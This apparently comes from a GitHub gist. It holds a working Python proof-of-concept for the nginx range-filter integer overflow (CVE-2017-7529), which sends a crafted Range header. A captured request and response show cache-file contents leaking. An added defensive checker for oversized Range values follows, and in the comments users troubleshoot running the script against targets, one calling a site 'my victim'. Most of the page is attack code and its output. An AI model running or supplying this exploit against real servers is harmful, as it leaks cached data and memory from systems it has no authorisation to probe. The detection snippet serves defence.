Nginx - Remote Integer Overflow Vulnerability

CVE 2017-7529

Nginx versions from 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow in the nginx range filter module. A specially crafted request can trigger it and leak potentially sensitive information.

Make sure requests is installed

Usage

usage: python CVE_2017_7529.py [-h] url

Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529

positional arguments:
  url         URL to test

optional arguments:
  -h, --help  show this help message and exit

Requests

GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import sys
import logging
import argparse

try:
    import requests
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    # Certificate verification is disabled below, so silence the warning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
    print("Please install the requests module.")
    sys.exit(1)

logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_request(url, headers=None, timeout=8):
    # GET the URL and log the status code and Server header
    kwargs = {"headers": headers, "timeout": timeout, "verify": False}
    response = requests.get(url, **kwargs)
    http_headers = response.headers
    log.info("status: %s" % response.status_code)
    log.info("server: %s" % http_headers.get("Server", ""))
    return response


def exploit(url):
    log.info("target: %s", url)
    # First request: learn the size of the resource
    response = send_request(url)
    content_length = response.headers.get("Content-Length", 0)
    bytes_length = int(content_length) + 623
    # Second suffix range is computed as one integer so its digits stay
    # correct for any resource size (same value as before for small files)
    content_length = "bytes=-%d,-%d" % (
        bytes_length,
        9223372036854776000 - bytes_length,
    )
    # Second request: send the crafted Range header and inspect the status
    response = send_request(url, headers={"Range": content_length})
    if response.status_code == 206 and "Content-Range" in response.headers:
        log.info("vulnerable?: Vulnerable to CVE-2017-7529")
    elif response.status_code == 416:
        log.warning("vulnerable?: Not Vulnerable (Range Not Satisfiable)")
    else:
        log.info("vulnerable?: Unknown (%s)" % response.status_code)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529"
    )
    parser.add_argument("url", help="URL to test", type=str)
    args = parser.parse_args()
    # Reject URLs without a scheme or path before sending anything
    url = requests.utils.urlparse(args.url)
    if not url.scheme:
        print(
            "URL scheme specifier is missing. Please include either 'http://' or 'https://'."
        )
        sys.exit(1)
    if not url.path:
        print("URL path is missing. Please include a full path.")
        sys.exit(1)
    exploit(args.url)
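
A defender-side check for the exchange shown under Requests, added here as an example and not part of the gist: it flags Range header values whose sizes cannot fit a signed 64-bit offset, and Content-Range values with a negative start. The function names are hypothetical, and it assumes the Range header is available to you, for instance logged through a custom `log_format` that includes `$http_range`.

```python
import re

INT64_MAX = 2**63 - 1  # largest value a signed 64-bit offset can hold


def suspicious_range(header):
    """Return a reason if a Range header value cannot be handled safely
    with signed 64-bit arithmetic, otherwise None."""
    unit, _, specs = header.strip().partition("=")
    if unit.strip().lower() != "bytes":
        return None
    total = 0
    for spec in specs.split(","):
        m = re.fullmatch(r"\s*(\d*)-(\d*)\s*", spec)
        if not m or m.groups() == ("", ""):
            return "malformed range spec"
        first, last = m.groups()
        if any(n and int(n) > INT64_MAX for n in (first, last)):
            return "value exceeds signed 64-bit"
        if first == "":
            size = int(last)                  # suffix form "-N": last N bytes
        elif last == "":
            continue                          # "N-": size depends on the file
        else:
            size = max(int(last) - int(first) + 1, 0)
        total += size
        if total > INT64_MAX:
            return "sum of range sizes exceeds signed 64-bit"
    return None


def negative_content_range(value):
    """True if a Content-Range value starts at a negative offset."""
    m = re.fullmatch(r"bytes\s+(-?\d+)-(\d+)/(\d+|\*)", value.strip())
    return bool(m) and int(m.group(1)) < 0


# Constructed samples; the first is the Range value from the request above.
SAMPLES = [
    "bytes=-17208,-9223372036854758792",
    "bytes=0-499",
    "bytes=-500",
    "bytes=0-99,200-299",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(value, "->", suspicious_range(value) or "ok")
    print(negative_content_range("bytes -623-16584/16585"))
```

Each number in the captured Range value fits in 64 bits on its own; only the running total crosses the limit, which is why the check sums the sizes instead of testing them one by one.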

attacker007 commented Sep 9, 2019

Supposing target is abc.example.com

I am getting error while running this command

python CVE_2017_7529.py abc.example.com

Result

INFO:__main__:target: abc.example.com
Traceback (most recent call last):
  File "CVE_2017_7529.py", line 49, in <module>
    exploit(args.url)
  File "CVE_2017_7529.py", line 27, in exploit
    http_response = send_http_request(url)
  File "CVE_2017_7529.py", line 17, in send_http_request
    http_response = requests.get(url, headers=headers, timeout=timeout)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 519, in request
    prep = self.prepare_request(req)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 462, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 313, in prepare
    self.prepare_url(url, params)
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 387, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 

Requests is already installed on macOS Mojave...
I have also checked with both python and python3 and am getting the same error. Please let me know how I can get rid of that error.

Thanks..

Author

thehappydinoa commented Sep 9, 2019

Hey, you need a specific url that is vulnerable, such as https://abc.example.com/image.jpg

PvtSec commented Dec 17, 2019

INFO:__main__:status: 200
INFO:__main__:server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 416
INFO:__main__:server: nginx/1.14.0 (Ubuntu)
WARNING:__main__:vulnerable: Not Vulnerable (Range Not Satisfiable)

What does this mean?
And if vulnerable what should be expected?

Mr-w4n73d commented Feb 29, 2020

python CVE_2017_7529.py https://example.com/robots.txt
INFO:__main__:target: https://example.com/robots.txt
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:__main__:status: 200
INFO:__main__:server: nginx/1.12.2
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:__main__:status: 200
INFO:__main__:server: nginx/1.12.2
INFO:__main__:vulnerable: Unknown (200)

Now what to do? My victim has only a robots.txt dir with a 200 OK response.

silentbronco commented Mar 12, 2020

> Supposing target is abc.example.com
>
> I am getting error while running this command
>
> python CVE_2017_7529.py abc.example.com
>
> Result
>
> INFO:__main__:target: abc.example.com
> Traceback (most recent call last):
>   File "CVE_2017_7529.py", line 49, in <module>
>     exploit(args.url)
>   File "CVE_2017_7529.py", line 27, in exploit
>     http_response = send_http_request(url)
>   File "CVE_2017_7529.py", line 17, in send_http_request
>     http_response = requests.get(url, headers=headers, timeout=timeout)
>   File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 75, in get
>     return request('get', url, params=params, **kwargs)
>   File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 60, in request
>     return session.request(method=method, url=url, **kwargs)
>   File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 519, in request
>     prep = self.prepare_request(req)
>   File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 462, in prepare_request
>     hooks=merge_hooks(request.hooks, self.hooks),
>   File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 313, in prepare
>     self.prepare_url(url, params)
>   File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 387, in prepare_url
>     raise MissingSchema(error)
> requests.exceptions.MissingSchema: Invalid URL
>
> Requests is already installed on macOS Mojave...
> I have also checked with both python and python3 and am getting the same error. Please let me know how I can get rid of that error.
>
> Thanks..

You are supposed to use a protocol, either https:// or http://

im403 commented Oct 19, 2020

how to fix ssl error

Traceback (most recent call last):
  File "CVE_2017_7529.py", line 49, in <module>
    exploit(args.url)
  File "CVE_2017_7529.py", line 27, in exploit
    http_response = send_http_request(url)
  File "CVE_2017_7529.py", line 17, in send_http_request
    http_response = requests.get(url, headers=headers, timeout=timeout)
  File "/usr/local/lib/python3.6/dist-packages/requests/api.py", line 76, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests/api.py", line 61, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 530, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 665, in send
    history = [resp for resp in gen]
  File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 665, in <listcomp>
    history = [resp for resp in gen]
  File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 245, in resolve_redirects
    **adapter_kwargs
  File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 643, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests/adapters.py", line 514, in send
    raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='example.com', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)'),))

Author

thehappydinoa commented Oct 19, 2020

@im403 I just pushed an update to disable SSL verification.

jacob2020baklas commented Jan 17, 2021

I think this would do https://stackoverflow.com/a/63750034

but I'm not that good at Python

Tested on both py2 & py3, the same error

Traceback (most recent call last):
  File "CVE_2017_7529.py", line 75, in <module>
    exploit(args.url)
  File "CVE_2017_7529.py", line 47, in exploit
    response = send_request(url, headers={"Range": content_length})
  File "CVE_2017_7529.py", line 28, in send_request
    response = requests.get(url, **kwargs)
  File "/home/devgen/.local/lib/python2.7/site-packages/requests/api.py", line 76, in get
    return request('get', url, params=params, **kwargs)
  File "/home/devgen/.local/lib/python2.7/site-packages/requests/api.py", line 61, in request
    return session.request(method=method, url=url, **kwargs)
  File "/home/devgen/.local/lib/python2.7/site-packages/requests/sessions.py", line 542, in request
    resp = self.send(prep, **send_kwargs)
  File "/home/devgen/.local/lib/python2.7/site-packages/requests/sessions.py", line 697, in send
    r.content
  File "/home/devgen/.local/lib/python2.7/site-packages/requests/models.py", line 831, in content
    self.content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
  File "/home/devgen/.local/lib/python2.7/site-packages/requests/models.py", line 758, in generate
    raise ContentDecodingError(e)
requests.exceptions.ContentDecodingError: ('Received response with content-encoding: gzip, but failed to decode it.', error('Error -3 while decompressing: incorrect header check',))

suhas-s-dev commented May 24, 2021

Worked fine for me! Thanks!

A1vinSmith commented Aug 28, 2021

> INFO:__main__:status: 200
> INFO:__main__:server: nginx/1.14.0 (Ubuntu)
> INFO:__main__:status: 416
> INFO:__main__:server: nginx/1.14.0 (Ubuntu)
> WARNING:__main__:vulnerable: Not Vulnerable (Range Not Satisfiable)
>
> What does this mean?
> And if vulnerable what should be expected?

"vulnerable?: Vulnerable to CVE-2017-7529" if it's vulnerable

skirkyn commented Mar 26, 2022

Folks! If you are using this script and getting an error but can't look at the code and figure it out, please, start doing something else!
To author: thank you very much!